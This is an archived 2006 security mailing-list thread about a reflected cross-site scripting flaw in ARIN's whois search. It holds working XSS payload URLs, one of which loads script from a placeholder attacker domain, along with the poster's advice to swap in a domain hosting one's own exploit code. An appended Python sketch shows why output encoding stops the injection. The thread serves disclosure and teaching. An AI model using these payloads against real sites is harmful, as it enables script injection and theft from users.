lists.openwall.net
Open Source and information security mailing list archives
Date: Fri Mar  3 17:00:10 2006
From: Security at peadro.net (Terminal Entry)
Subject: Re: Arin.net XSS

Dave,

You need to copy and paste the full URL into your browser for the XSS to take place.  All exploit examples are still working as I just verified.

<copy> http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E </paste>

<copy> http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E </paste>

For my second example I used a fake domain name as an example of where the malicious code could be executed.  Change the "maliciouscode.net" to a domain hosting your .js code for the exploit to take effect.

Thanks,

Discovered by Terminal Entry security [.at.] peadro (.)net



-----Original Message-----
From: full-disclosure-bounces@...ts.grok.org.uk
[mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of Dave Korn
Sent: Friday, March 03, 2006 9:53 AM
To: full-disclosure@...ts.grok.org.uk
Cc: bugtraq@...urityfocus.com
Subject: [Full-disclosure] Re: Arin.net XSS

"Terminal Entry" <Security@...dro.net> wrote in message 
news:353A3025-099E-41C9-978B-A57B2C80AAE6@...ectl...

> Notification
> Multiple attempts to contact Arin site administrators went unanswered

  Looks like someone was paying at least some attention, because none of
your examples worked when I tried them just now.

> Some demonstration exploit URLs are provided:
>
> http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E

No match found for <IMG SRC="javascript:alert('XSS');">.

>
> http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E

No match found for <XCRIPT SRC=http://maliciousCode.net/exploit.js></XCRIPT>.

[  Funnily enough it goes bold after 'SRC=' and the rest of the thing turns
into a borken link to "http://maliciousCode.net/exploit.js></XCRIPT>"  ]

>
> http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E

No match found for <IMG SRC="javascript:alert('XSS');">.

    cheers,
      DaveK
-- 
Can't think of a witty .sigline today....
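
The reply's output shows SCRIPT renamed to XCRIPT while the reflected text is still rendered as markup (bold text, a broken link). As an added example (not part of either e-mail, and not ARIN's code), the sketch below runs the two query strings from the thread through a raw echo, an assumed tag-renaming filter, and HTML output encoding, then lists the elements an HTML parser finds; the function names and the filter regex are assumptions.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# The two demonstration URLs quoted in the thread.
URLS = [
    "http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E",
    "http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E",
]

def query_input(url):
    """Decode the queryinput parameter the way a web server would."""
    return parse_qs(urlsplit(url).query)["queryinput"][0]

def render_raw(q):
    # Reflects the query verbatim into the HTML response.
    return "<p>No match found for " + q + ".</p>"

def render_blacklist(q):
    # Assumed filter: renames <SCRIPT to <XCRIPT, as the reply's output suggests.
    return render_raw(re.sub(r"(?i)(</?)script", r"\1XCRIPT", q))

def render_encoded(q):
    # Output encoding: <, >, &, " and ' become entities, so input stays text.
    return "<p>No match found for " + html.escape(q, quote=True) + ".</p>"

class TagCollector(HTMLParser):
    """Records every element start tag an HTML parser sees."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def injected_tags(page):
    """Tags in the response other than the template's own <p>."""
    collector = TagCollector()
    collector.feed(page)
    collector.close()
    return [t for t in collector.tags if t != "p"]

if __name__ == "__main__":
    for url in URLS:
        q = query_input(url)
        for render in (render_raw, render_blacklist, render_encoded):
            print(render.__name__, injected_tags(render(q)))
```

Only the encoded variant leaves the parser with no elements beyond the template's own paragraph; the renaming filter still lets the query create IMG and XCRIPT elements in the page.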




